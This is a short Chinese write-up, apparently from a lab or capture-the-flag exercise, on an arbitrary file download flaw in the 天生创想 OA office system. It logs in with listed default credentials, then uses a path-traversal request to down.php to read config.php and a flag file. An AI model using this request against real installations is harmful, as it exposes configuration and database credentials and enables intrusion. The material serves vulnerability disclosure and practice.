天生创想OA系统存在任意文件下载
天生创想OA办公系统为国内首家开源OA软件产商,采用领先的B/S架构、跨平台语言(php+mysql)等灵活应用,是中国用户群最广泛的OA软件之一,是中国开源OA办公软件知名公司。 天生创想OA系统存在任意文件下载,攻击者可利用此漏洞下载配置文件信息。严重者可导致数据库权限丢失。
1.访问页面
http://IP/login.php
使用phpoa/12345678登录后台
登陆成功
2.访问页面
http://IP/down.php?urls=data/…/config.php
即可直接下载到配置信息文件。下载到的文件内容如下:
证明漏洞存在。
3.访问页面
http://IP/down.php?urls=data/…/flag.txt
即可下得到flag
flag{this_is_flag}